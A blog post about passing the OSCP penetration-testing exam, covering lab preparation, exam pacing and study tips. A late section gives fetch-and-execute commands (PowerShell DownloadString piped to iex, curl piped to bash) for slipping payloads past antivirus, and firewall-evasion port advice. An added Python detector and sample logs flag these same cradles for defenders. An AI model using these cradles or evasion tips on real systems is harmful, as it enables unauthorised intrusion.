Hi everyone, today I’m going to tell you my story of how I was able to root all 5 machines in my OSCP exam and earn 100 points in just 10 hours! I hope you can get something from here that might be useful on your own journey!
It wasn’t easy, but it wasn’t that hard either; the only right way to describe the journey is the word “Exciting”. To give a better understanding, I am a Computer Science graduate with a Cyber Security major. I have been involved in cyber defense technology research for the past 2 years.
I have a very good understanding of Python, C, and Bash. These three played a major part in the success of my blue-team-related thesis about using machine learning to create a fully autonomous web application firewall. If you’re interested in one of our research papers about remote code execution, you can read it here
1st July 2021 was the start of the journey. My company enrolled me in a 60-day PWK course starting from 11 July 2021. In my case, they cleared my schedule to the point where it felt like paid leave 😂😂. The only thing I needed to do was hack, hack, and hack!
For the first 10 days, while waiting for the PWK labs, I decided to practice in the Hack The Box lab. I followed TJnull’s OSCP-like box list and only did the Linux boxes. My plan was to get familiar with Linux exploitation before the PWK lab started, so I could focus on Windows exploitation and buffer overflows later on.
I know about “Try Harder”, but I just can’t click with this methodology when we are in the learning phase. I mean, you don’t know what you don’t know. When you are stuck with an exploit and don’t know how to get things to work, there are two things you can do:
- You keep trying the same exploit over and over again with an angry face and revert the machine over and over again, smashing your keyboard in the process :)
- You reach out to the community, a forum, an ippsec video, or the official writeup to understand how the exploit works, why the service is exploitable, and how the exploit takes place, so that you understand the flow.
I solved all the PWK labs and TJnull’s list of boxes, and I do realize that sometimes we need to use a specific exploit with very limited resources, even on Google. You need help, at least a sanity check, or a good keyword to keep you on the right track.
My methodology is simple: when I encounter a new service that I’m not familiar with and have already spent too much time trying to get the exploit to work without any success, I simply visit the forum without any hesitation. Then I make sure that I take good notes, so that if I encounter the same service in the future, I can easily apply what I just learned. Pivoting and tunneling can be tricky too! Remember that “You learn something new every day.”
The PWK Lab
This might be the most exciting moment of my life. It felt like heaven when I could finally express my curiosity on 75 different live targets. As I said before, I had already done TJnull’s boxes, and the lab is indeed surprisingly similar to those boxes; the only noticeable difference is that the HTB boxes have a CTF-like touch, while the PWK lab feels like a straightforward real-life scenario.
In my first week, I was able to root a total of 29 boxes🔥🔥. In the second week I added another 23, for a total of 52 boxes in 2 weeks🔥🔥. My priority was to attack the Active Directory and dependent machines and skip the hard machines. Slowly but surely, I could feel that the fire inside me would burn out soon.
At this point, it felt almost impossible to keep going. I was stuck between two opposite feelings. First, I felt like I was repeating the same things over and over again. Second, it felt like the remaining boxes were very hard and almost impossible to solve.
To deal with this, I decided to take a week-long vacation. I went out with my family, played Dota with my friends, and stayed up all night playing Cyberpunk (with a netrunner/hacker build, for sure!) for the whole week. Whenever I felt guilty, I would watch ippsec videos and keep my notes going.
If you are in this period, to move forward you just need to constantly ask yourself:
How badly do you want it?
In my fourth week, I had played enough and it was time to come back to the grind. While doing the retired exam machines in one of the departments, I had trouble understanding static binaries and pivoting. Lucky for me, I found a friend on the Offsec community Discord who taught me the right way to pivot and the power of the Nishang reverse shell.
The buffer overflow was a bit hard for me, but luckily Offsec provides a very clear video explaining step by step how the exploit occurs, so I understood the whole flow of the exploit. After reproducing the Win32 BOF exercises, the BOF machine in the lab was too easy.
In the first month of my lab time, I was able to completely pwn all the boxes in the PWK lab! I felt very happy but also worried about Windows privilege escalation, as I am not too familiar with the Windows environment (I am a Mac user).
After I had done all the boxes, I didn’t touch the lab anymore. Every day for the next 2 weeks I just played Dota and watched ippsec videos. Every time I learned something new, I added it to my notes.
In this period, I found https://ippsec.rocks/, and it was very useful in my exam. I booked the exam for the 6th of September and later rescheduled it to the 3rd of September.
The Important Points in PWK Lab
If you want to have a good exam experience, I strongly suggest considering everything on this list:
- Make sure you solve the big 4 boxes in the lab without any help. No need to rush; just do these boxes whenever you feel ready. They will give you lots of new knowledge.
- Make sure you root every retired exam box. You will know one when you see it. These boxes are very different from the lab boxes; you will know why, and it will tell you what to expect in the real exam.
- Make sure you master your tools. What did you choose? NmapAutomator? AutoRecon? Manual Nmap? Make sure you are familiar with the output. Try your tools on the retired exam boxes.
- Make sure you master your reverse shell and understand how to choose the right port. The exam machines are very tricky and sensitive to inbound/outbound port rules. Test your methodology on the retired exam boxes.
- For what it’s worth, don’t focus on the public department, as it will only give you the basic skills you need. Break into another department, learn how to pivot, and have fun with the real boxes!
The OSCP Exam
My exam started at 10.00 AM. I woke up at around 9.30 AM and was kinda surprised when I went to my Discord channel and saw that all my friends were waiting for me. I have 3 best friends there: one is an IT GRC officer, one is a risk consultant, and one is a colleague. They sent me coffee, gave me motivation, and were always there for the next 10 hours. Whenever I took a break, I would join the Discord channel and talk about how we were going to play Dota and Age of Empires III hard after I passed my exam🙃🙃
This was the first time that someone from my class took the OSCP exam, and everyone was very excited even though they are not into offensive security at all 🙃🙃
15 minutes before the exam started, I left the Discord channels and proceeded to the verification process. Everything went well and I got my VPN access at exactly 10.00 AM.
The plan is simple.
- Win32 Buffer Overflow (25 Points)
- Easy Box (10 Points)
- Medium Box (20 Points)
- Medium Box (20 Points) — Safe Point
- Hard Box (25 Points)
I used NmapAutomator on the 25-point box to save time. Then I started with my plan.
Well, the unexpected went two ways. The first was “Wow, this is too easy” and the second was “What the hell is this?”. The first was for the buffer overflow: after spending around a week learning buffer overflow methodology, it was a relief when I solved the buffer overflow box in just 30 minutes.
I took a 30-minute break after finishing the buffer overflow while waiting for Nmap to run. I ordered Gojek to deliver me some coffee, Shihlin, candy, and lunch. I was very excited!!
Next were the 10-point and 20-point boxes. These two boxes taught me about “Expect the Unexpected” and the “Try Harder” methodology 🙃🙃 I kept making small mistakes by underestimating an exploit and choosing a random port without any reason. After I applied what I had learned from the retired exam boxes in the lab, I was able to complete these boxes in just two hours.
The boxes were relatively easy but needed lots of effort. Debugging, fixing, and downloading the unfamiliar services to get a better understanding of them is the way to understand the flow and the flaw.
I took a one-hour break to go out with my little sister and pick up some ice cream at McDonald’s. Don’t forget to relax; you’re free to take as many breaks as you want, as long as you ask the proctor politely. Then I started my next box.
I have two mottos to keep me on track with the exploit and sanity check my progress. If it’s too hard, I ask myself, “OSCP is a foundation course, would it really go this far?” And if it looks too easy and straightforward but the exploit didn’t work, I ask myself, “If it is this easy, why is the OSCP pass rate so low? There must be another way.”
The next two boxes were relatively exciting. As far as I remember, I didn’t use any public exploit to gain a shell at all! Purely chaining misconfigurations and taking advantage of open services! These boxes were very fun and represent a real-life scenario. In around two and a half hours, I managed to get root on the 20-point box and a low-privilege shell on the 25-point box. I already had 87.5 points in my pocket and felt safe.
I decided to take another one-hour break. I contacted my colleagues to inform them that I had 4 roots and 1 low-privilege shell. They were very excited and congratulated me. My friends on Discord were very happy and sent me some food. I used this time to take a bath and relax.
The last privilege escalation took me 2 hours in total. It was very exciting to finally be able to use my web exploitation skills in this advanced, CTF-like case. By chaining some vulnerabilities and services, I managed to get a Windows admin account through a web shell. I jumped out of my brand-new secret lab chair. My dad was next to me and hugged me when I said “I got 100 points”. I then messaged the proctor to say “Heyy, just want to let you know I got 100 points :) I am very happy”. As expected, he didn’t care and replied “Keep up the good work” 🙃🙃.
Even though it was only a web shell, I had mastered Nishang as my secret weapon and knew how to upgrade this shell to a fully interactive one. So I decided to take another short 15-minute break to let my friends and colleagues know that I had 100 points! I WAS VERY HAPPY!
After the break, I upgraded the web shell to a proper reverse shell. It was very easy since I had already used Nishang on all my Windows boxes. In exactly 10 hours, I rooted 5 machines and got 100 points! It took me another hour to reproduce all the exploits and take screenshots for the report. I ended my exam afterward.
I played Dota all night and started on the report the next day. Around 7 hours after my submission, I got an email from the Offensive Security team saying that I had passed my OSCP exam!
These are the resources that helped me a lot in the lab and the exam.
- Got RCE on a Windows-based system? Nishang Windows reverse shell
- Already got a low-privilege shell? LinPEAS/WinPEAS to enumerate and pspy to spot cron jobs.
- Don’t know how to exploit a specific service? ippsec.rocks
- Don’t know about common website and service exploits? HackTricks
- No service is exploitable? Try a kernel exploit: Linux Exploit Suggester 2 and Metasploit’s Local Exploit Suggester for Windows.
Antivirus Evasion Technique
In the lab and exam, you will encounter lots of machines with built-in antivirus. Whenever you try to download a reverse shell/backdoor payload like Nishang or an msfvenom-generated payload, the file will instantly be removed from the server. You can take advantage of in-memory download and execute instead, as shown below.
For Windows, you can use:
powershell iex (New-Object Net.WebClient).DownloadString('url')
And for Linux, you can take advantage of command chaining, in this case a pipe, to feed the raw file directly to bash:
curl URL | bash
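From the defender's side, the reason these two cradles slip past file-scanning antivirus (nothing is written to disk) is also why they stand out in process command-line logs. As an added example that is not part of the original post, here is a small Python detector that flags exactly these cradle shapes; the log format and sample lines are constructed for the example, and the curl rule is generalized to wget and to sh/zsh/dash. Because the post notes the transfer itself will deliberately use port 80 or 443, the rules key on the command shape rather than on the destination port.

```python
import re

# Constructed sample log lines (not from the post). Simplified "key=value"
# export of process command lines, e.g. from Sysmon event 1 / PowerShell
# script block logging on Windows and auditd execve records on Linux.
SAMPLE_LOG = """\
2021-09-03T10:41:02 host=WEB01 user=svc_web cmd=powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.5/rev.ps1')
2021-09-03T10:42:11 host=DB02 user=backup cmd=curl http://10.10.14.5:443/x.sh | bash
2021-09-03T10:43:00 host=DB02 user=backup cmd=wget -qO- http://10.10.14.5/x.sh | sh
2021-09-03T10:44:15 host=WEB01 user=admin cmd=powershell Get-Service -Name Spooler
2021-09-03T10:45:00 host=DB02 user=backup cmd=curl -O http://mirror.example/pkg.tar.gz
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")
URL_RE = re.compile(r"https?://[^\s'\"()]+")

# The two cradles from the post: DownloadString fed to IEX, and curl/wget piped
# into a shell. Both execute the fetched text without creating a file, which
# is why an on-access file scanner never sees the payload.
CRADLE_RULES = [
    ("ps_downloadstring_iex", re.compile(
        r"(?i)\b(iex|invoke-expression)\b.*downloadstring\s*\("
        r"|downloadstring\s*\(.*\|\s*(iex|invoke-expression)\b")),
    ("curl_wget_pipe_shell", re.compile(
        r"(?i)\b(curl|wget)\b[^|]*\|\s*(ba|z|da)?sh\b")),
]

def scan(log_text):
    """Return one alert dict per log line whose command matches a cradle rule."""
    alerts = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue  # malformed line; a real pipeline would count these
        cmd = m.group("cmd")
        for name, rule in CRADLE_RULES:
            if rule.search(cmd):
                url = URL_RE.search(cmd)  # enrich with the staging URL, if any
                alerts.append({"ts": m.group("ts"), "host": m.group("host"),
                               "user": m.group("user"), "rule": name,
                               "url": url.group(0) if url else None})
                break  # one alert per line is enough
    return alerts

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"{a['ts']} {a['host']} {a['user']} {a['rule']} {a['url']}")
```

A plain `curl -O` download without a pipe is deliberately not flagged, since that one does reach disk and is the antivirus's job.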
Port Choosing Technique
Make sure you understand how to determine which port to use. Obviously, if you force a Windows server to download files from a random port, the firewall will block it right away. Aim for common misconfigurations to take advantage of. For example, if you want to transfer a file, make sure to host it on port 80 or 443. And if you want to make a reverse connection, try port 22. If no port is working, try port reuse by killing the application from the low-privilege shell.
I will update this section when I remember other resources I used.
I am forever thankful to be part of the Vantage Point Security team. All my colleagues are very humble and supportive. I am thankful for my supportive family and friends as well.
Thanks to my friends for the constant support and time invested in me: Christoval Leaved, Yerriell K Hidayat, Verdi Vajira, and Pulkit Talwar.